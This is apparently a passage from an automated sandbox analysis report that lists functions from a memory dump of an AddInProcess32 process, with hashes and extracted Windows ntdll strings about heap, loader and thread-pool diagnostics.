            • Instruction ID: d1f15bffba850d98a9cba390c147b9e46e8cc11c831362e44f64602aa1a451aa
            • Opcode Fuzzy Hash: c1f29a72ccf08d8f79781afd5367ebfaa5d6430904485e2cc99f2f9763143790
            • Instruction Fuzzy Hash: 39F10231A10246EFDB65CF68C480BAABBF9FF09704F0C8459E989EB251D734AA45CB51
            Function 01939179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
            • API String ID: 0-3063724069
            • Opcode ID: d1b5f7da0ecb6e4c7618a588a2746cc7d7aefef9acfc6d085bfd61ec4e78c267
            • Instruction ID: e627aa899ab35f366e01a54e607ec458d28089cf6b139e7a52efdd57d95e2bf9
            • Opcode Fuzzy Hash: d1b5f7da0ecb6e4c7618a588a2746cc7d7aefef9acfc6d085bfd61ec4e78c267
            • Instruction Fuzzy Hash: 29D1C5B2805316AFD721DA58C884B6BBBECAFD4718F04492DFA8897250D7B4DE44C792
            Function 01950274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
            • API String ID: 0-1700792311
            • Opcode ID: da544709f65f4f0472dda93a46eb06e8b8623d84f0e15bf69439e82aacfbc0e7
            • Instruction ID: 248d717c4e74c8ecfab94fc86dcc2cf069843389f47ae75db110395642ea054b
            • Opcode Fuzzy Hash: da544709f65f4f0472dda93a46eb06e8b8623d84f0e15bf69439e82aacfbc0e7
            • Instruction Fuzzy Hash: 09D1CC31614686DFDB62DF6CC480AADBBF5FF49B05F0C8059F849AB252D7349A82CB11
            Function 0189D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
            Download Yara Rule
            Strings
            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0189D196
            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0189D262
            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0189D2C3
            • @, xrefs: 0189D313
            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0189D146
            • @, xrefs: 0189D2AF
            • @, xrefs: 0189D0FD
            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0189D0CF
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
            • API String ID: 0-1356375266
            • Opcode ID: 837ac3d915eb55d329f9a53d6a4bf555eb78c7f51c57e91da67543a423cd036a
            • Instruction ID: 4f7815120af2ab9bfcbb74286287d34ae218ad447e0a74af7a59ccfd6dfac6fb
            • Opcode Fuzzy Hash: 837ac3d915eb55d329f9a53d6a4bf555eb78c7f51c57e91da67543a423cd036a
            • Instruction Fuzzy Hash: E4A17D72908306DFDB21CF59C484B5BBBE8BB84725F044A2EE698D7241D774DA08CB57
            Function 018B9EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
            Download Yara Rule
            Strings
            • Status != STATUS_NOT_FOUND, xrefs: 0190789A
            • Internal error check failed, xrefs: 01907718, 019078A9
            • minkernel\ntdll\sxsisol.cpp, xrefs: 01907713, 019078A4
            • sxsisol_SearchActCtxForDllName, xrefs: 019076DD
            • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 01907709
            • @, xrefs: 018B9EE7
            • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 019076EE
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
            • API String ID: 0-761764676
            • Opcode ID: 473bc33642053e5555d273a766b2f64462ffbfeb4bdec8a9d178c6c24d6750ff
            • Instruction ID: b9148b60f1061717202e2325dee29fab3be2f4ace7ac387f93ae7048574f5ddf
            • Opcode Fuzzy Hash: 473bc33642053e5555d273a766b2f64462ffbfeb4bdec8a9d178c6c24d6750ff
            • Instruction Fuzzy Hash: B8126D74D00229DFDB29CF98C881AEDB7B4FF18724F148469E949EB351E734AA41CB61
            Function 018AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
            • API String ID: 0-1109411897
            • Opcode ID: 6c6f8929e92bf661148dcb9599a23259d7287d38c2024853c56670c9f73b52ae
            • Instruction ID: 2dfcff5fd90352c152c7049c344be5ff26021b66a1e927b1bbdb48d5330f7d87
            • Opcode Fuzzy Hash: 6c6f8929e92bf661148dcb9599a23259d7287d38c2024853c56670c9f73b52ae
            • Instruction Fuzzy Hash: FDA25B70A0562A8FEB65DF18CD887ADBBB5AF45704F5442E9DA0DE7290DB309E81CF40
            Function 0189F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-523794902
            • Opcode ID: 94637b1d95673c16c9b463185faad4ab2d9d6da5ee2faee6607a8599737a3630
            • Instruction ID: 9f9f2ce57f435e896ed4ad7d1e2e4a30e40f826127f79fd99cd996971885da9e
            • Opcode Fuzzy Hash: 94637b1d95673c16c9b463185faad4ab2d9d6da5ee2faee6607a8599737a3630
            • Instruction Fuzzy Hash: F242CC312086829FDB19DF28C884B6ABBE5FF84708F18496DFA85CB351D734DA41CB52
            Function 018AADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
            • API String ID: 0-4098886588
            • Opcode ID: cfaf136a533c8a3349d0072ede9acab88662e313272e5605318823b2e285c0fd
            • Instruction ID: 67df72bcafc9bb5a41a90e40aee5602850c910b98200ed3edbbec5d0a8668278
            • Opcode Fuzzy Hash: cfaf136a533c8a3349d0072ede9acab88662e313272e5605318823b2e285c0fd
            • Instruction Fuzzy Hash: 4232AE709002698FEB26CB18C894BEEBBB9BF45344F5441EAE849E7291D7319F81CF40
            Function 018BB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
            • API String ID: 0-122214566
            • Opcode ID: f4b668ea4e58b87fb34ebab8ca84eca36947842fd222b28fff730f80b3f3d533
            • Instruction ID: e9e29db29857cf8bda0f8d09a2e58576cf77bfadb75899baa6dca911a12778ea
            • Opcode Fuzzy Hash: f4b668ea4e58b87fb34ebab8ca84eca36947842fd222b28fff730f80b3f3d533
            • Instruction Fuzzy Hash: 2EC11371E0021AABDB268B68C8C0BFEBBA5BF45714F144069E906EB391D774DB44C391
            Function 018D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
            • API String ID: 0-792281065
            • Opcode ID: b1ff584273e8afb11fe134ed4b6cf60c0ccf9bd2fc0387fdca6715f651669332
            • Instruction ID: c9b18a10b2c8703f5a93d2c0186837506bd3c3e9a3641905466f8495eb0efe08
            • Opcode Fuzzy Hash: b1ff584273e8afb11fe134ed4b6cf60c0ccf9bd2fc0387fdca6715f651669332
            • Instruction Fuzzy Hash: 2F916C70B0031D9BEB35DF2CD884BAE7BA6BB54B24F140119E508EB389E7748A81C7D1
            Function 0194F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
            • API String ID: 0-1745908468
            • Opcode ID: 4f85bfef08f2de654ca299a440efacf6fe953181c13df15454699edd0d255f0b
            • Instruction ID: a80e3a38f943ae4b2fdfb4a94d0fb5d884b84286e12bf95b0f888995ecd2794d
            • Opcode Fuzzy Hash: 4f85bfef08f2de654ca299a440efacf6fe953181c13df15454699edd0d255f0b
            • Instruction Fuzzy Hash: 5C91CB31A006469FEB26DFACD480EADBBF1FF59704F18805DE449AB361CB359A41CB51
            Function 0189645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
            Download Yara Rule
            Strings
            • minkernel\ntdll\ldrinit.c, xrefs: 018F9A11, 018F9A3A
            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 018F99ED
            • LdrpInitShimEngine, xrefs: 018F99F4, 018F9A07, 018F9A30
            • Getting the shim user exports failed with status 0x%08lx, xrefs: 018F9A01
            • apphelp.dll, xrefs: 01896496
            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 018F9A2A
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
            • API String ID: 0-204845295
            • Opcode ID: 56060e7cfb04c842eb44dc97be2740460e83a28b9acb149629b3e64b7de7cb7c
            • Instruction ID: 32fb09066d2b5b6d9e945259405d33bf4ea07809310f62bfa7bae00f30ed33e5
            • Opcode Fuzzy Hash: 56060e7cfb04c842eb44dc97be2740460e83a28b9acb149629b3e64b7de7cb7c
            • Instruction Fuzzy Hash: 685180716083059FEB25DF28D881BAB77E5FB84748F14091DF685D7261E630EB48CB92
            Function 018CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
            Download Yara Rule
            Strings
            • RTL: Re-Waiting, xrefs: 0191031E
            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019102BD
            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019102E7
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
            • API String ID: 0-2474120054
            • Opcode ID: 60c7d93515814fbe59b2feaf11dc0dca938b738b0f8ed53c0f405004dfce4688
            • Instruction ID: c53510c3d020e59184744d0718d9afd85f8822975c99d2be14602828b6b3a54e
            • Opcode Fuzzy Hash: 60c7d93515814fbe59b2feaf11dc0dca938b738b0f8ed53c0f405004dfce4688
            • Instruction Fuzzy Hash: CDE1CE306047459FE725CF2CC884B2ABBE1BB85714F140A1DF6A9CB2D1D775DA85CB42
            Function 01929C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
            • API String ID: 0-3127649145
            • Opcode ID: 85bac9eaa529e63755a4408b70f4bc87222009eda4a53c135e295476a29b1eb9
            • Instruction ID: eefad975bf90e2a587cf17a10f9b501f9b901fd7cd4adbfc14eb75ce393ffc32
            • Opcode Fuzzy Hash: 85bac9eaa529e63755a4408b70f4bc87222009eda4a53c135e295476a29b1eb9
            • Instruction Fuzzy Hash: 22324971A0172A9BDB21DF69CC88B9AB7F8FF54704F1041EAD50DA7654DB70AA84CF40
            Function 018B9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
            • API String ID: 0-3393094623
            • Opcode ID: 1b1eeaef3ad1ec15a6eee4ff2f6b56c8088660694c3cb8d0456858835ca44255
            • Instruction ID: 8a833828409b7b2c26cfb56353498ea20fc78e1dc242cf077f7b1cbf3395cc62
            • Opcode Fuzzy Hash: 1b1eeaef3ad1ec15a6eee4ff2f6b56c8088660694c3cb8d0456858835ca44255
            • Instruction Fuzzy Hash: 3B025AB19083558FD721CF68C0C07ABBBE5AF85718F45891EEA89C7351E770DA44CB92
            Function 018C51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
            Download Yara Rule
            Strings
            • Kernel-MUI-Language-Disallowed, xrefs: 018C5352
            • Kernel-MUI-Number-Allowed, xrefs: 018C5247
            • Kernel-MUI-Language-SKU, xrefs: 018C542B
            • Kernel-MUI-Language-Allowed, xrefs: 018C527B
            • WindowsExcludedProcs, xrefs: 018C522A
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
            • API String ID: 0-258546922
            • Opcode ID: 9f66a238a5eba11f4357ee937befb84832c520225042fc2a166ce447381661d5
            • Instruction ID: f718a2bb2bb1f6da3525438c440f406c44b2ef4ece87caf430093a86568fd761
            • Opcode Fuzzy Hash: 9f66a238a5eba11f4357ee937befb84832c520225042fc2a166ce447381661d5
            • Instruction Fuzzy Hash: 90F12976E00229EFCF16DFA8C9809EEBBF9BF58B50F11005AE505E7250D674EA018B90
            Function 01924F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
            • API String ID: 0-2518169356
            • Opcode ID: 751afd85d9288c63dfa590e448ebb507fc240c4f3716a12092f6e5b6b3e101b0
            • Instruction ID: 38878ae7d52bc1040114450a242a9e04f31e30be017bfca89f7d23864b0584d3
            • Opcode Fuzzy Hash: 751afd85d9288c63dfa590e448ebb507fc240c4f3716a12092f6e5b6b3e101b0
            • Instruction Fuzzy Hash: 4691D172D0062A8BDB21CF5CC880AEEB7B4FF89310F594169E918E7355D739DA01CB91
            Function 018B70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            • Opcode ID: 6387c36162832f77ef39208d69ea1003f8dda8e18158e82ae7381a306a04fa19
            • Instruction ID: 5908104cbcf7221e45a5bd6b51084a560f352757dcbc952f365dfee5334e85d9
            • Opcode Fuzzy Hash: 6387c36162832f77ef39208d69ea1003f8dda8e18158e82ae7381a306a04fa19
            • Instruction Fuzzy Hash: 1B137D70A0065ADFDB25CF68C4D07E9BBB5BF89304F1881A9D949EB381D734AA45CF90
            Function 018B1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
            • API String ID: 0-3570731704
            • Opcode ID: 4b1a41bb32c157a8fb46feea5335b222230300f3d47a39bbe13ee014f596b4e6
            • Instruction ID: 67ae60e00257499d59d15a0a23d6d5ee5613b7812574630d1751d6df516f95dc
            • Opcode Fuzzy Hash: 4b1a41bb32c157a8fb46feea5335b222230300f3d47a39bbe13ee014f596b4e6
            • Instruction Fuzzy Hash: 1D923571A01229CFEB25CB18D894BA9B7B6BF45314F0581EAE94DEB391D7309E80CF51
            Function 018BA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
            Download Yara Rule
            Strings
            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01907D03
            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01907D39
            • SsHd, xrefs: 018BA885
            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01907D56
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
            • API String ID: 0-2905229100
            • Opcode ID: 38159d0b2009cf902553b8cbfbb470cbf1fa85740052395ebe0a189f3706673c
            • Instruction ID: ef16cd0c4e21b18ae6ccbe9dffab346e851eea134a69d400242fbcb6ac8cfac9
            • Opcode Fuzzy Hash: 38159d0b2009cf902553b8cbfbb470cbf1fa85740052395ebe0a189f3706673c
            • Instruction Fuzzy Hash: 8FD19035A00219DFDB29CF98C8C06EDBBB5FF48714F19405AE959EB341D331AA81CBA1
            Function 018B3D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            • Opcode ID: 7d243e02a07ff1cd6efe687e236219a572ba1107e3def9e3b39b0433ae727ed6
            • Instruction ID: 86e70b9d3c4b1bf948d77325c0c56efc8c13e607758653c27e9fe1ee6121b0c6
            • Opcode Fuzzy Hash: 7d243e02a07ff1cd6efe687e236219a572ba1107e3def9e3b39b0433ae727ed6
            • Instruction Fuzzy Hash: 14E2A170A002199FDB25CF68C4D1BE9BBF1FF49304F188199D94AEB396D734AA45CB90
            Function 018AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
            • API String ID: 0-379654539
            • Opcode ID: a1e4aee68d906eee3fa52e3219ab67bb8f663c181d51ce571bf6060ddbbc0977
            • Instruction ID: f3670fb8697bbede811423b5c715f9b8751151fcc89fb9758736a9e54d73987c
            • Opcode Fuzzy Hash: a1e4aee68d906eee3fa52e3219ab67bb8f663c181d51ce571bf6060ddbbc0977
            • Instruction Fuzzy Hash: C9C1AF74508386CFE729CF58C084B6AB7E4FF84708F444869F995CBA91E734CA49CB56
            Function 018D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
            Download Yara Rule
            Strings
            • minkernel\ntdll\ldrinit.c, xrefs: 018D8421
            • @, xrefs: 018D8591
            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 018D855E
            • LdrpInitializeProcess, xrefs: 018D8422
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
            • API String ID: 0-1918872054
            • Opcode ID: f35ce1d2f6138e0b67194ab326da28bb20f4063bec9854279ad37294886b3c4c
            • Instruction ID: dc01b8c38e1bdb43818637b8a805b71822d9e64063544113117f1c5ad87be464
            • Opcode Fuzzy Hash: f35ce1d2f6138e0b67194ab326da28bb20f4063bec9854279ad37294886b3c4c
            • Instruction Fuzzy Hash: 39918E71508349AFE722DF69CC84EABBBECBB85744F40092EF684D2151E774DA44CB62
            Function 018B0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
            Download Yara Rule
            Strings
            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019055AE
            • HEAP: , xrefs: 019054E0, 019055A1
            • HEAP[%wZ]: , xrefs: 019054D1, 01905592
            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019054ED
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
            • API String ID: 0-1657114761
            • Opcode ID: 9ee4124f0e845b3499b193b58b6fd5c49152e7027d9863e7a074b4ffec7aa94b
            • Instruction ID: e84d419cc8bc6b22001eb18ed31fb60e3f20b77d44f4b94a2f72538b177a01f7
            • Opcode Fuzzy Hash: 9ee4124f0e845b3499b193b58b6fd5c49152e7027d9863e7a074b4ffec7aa94b
            • Instruction Fuzzy Hash: B7A1C13060420A9FDB25CF28C4D0BBBBBF5AF55704F188569E49ACB782D734EA45CB91
            Function 018A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
            Download Yara Rule
            Strings
            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01901028
            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01900FE5
            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0190106B
            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019010AE
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
            • API String ID: 0-1468400865
            • Opcode ID: 73b9deb04d428ce508d1ebfb4f3f97b9de838f6b1692022704bf6419c88cf70a
            • Instruction ID: 6765986e60502fdfd35d898ebf8dc02cb1469dde3d40ea456684bcfd1427d82b
            • Opcode Fuzzy Hash: 73b9deb04d428ce508d1ebfb4f3f97b9de838f6b1692022704bf6419c88cf70a
            • Instruction Fuzzy Hash: 4C71E4B19043059FDB21DF18C884B977FA8EF95754F580468F988CB28AE374D688CBD2
            Function 019511A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
            • API String ID: 0-336120773
            • Opcode ID: d9b21c221f7c29443ee816fdafa084356a3a1b9155052ba2ca488a127b604276
            • Instruction ID: cc5ec12276fb039763e3d734773014dff28ca45992d4c7f7802b1a7f812510ca
            • Opcode Fuzzy Hash: d9b21c221f7c29443ee816fdafa084356a3a1b9155052ba2ca488a127b604276
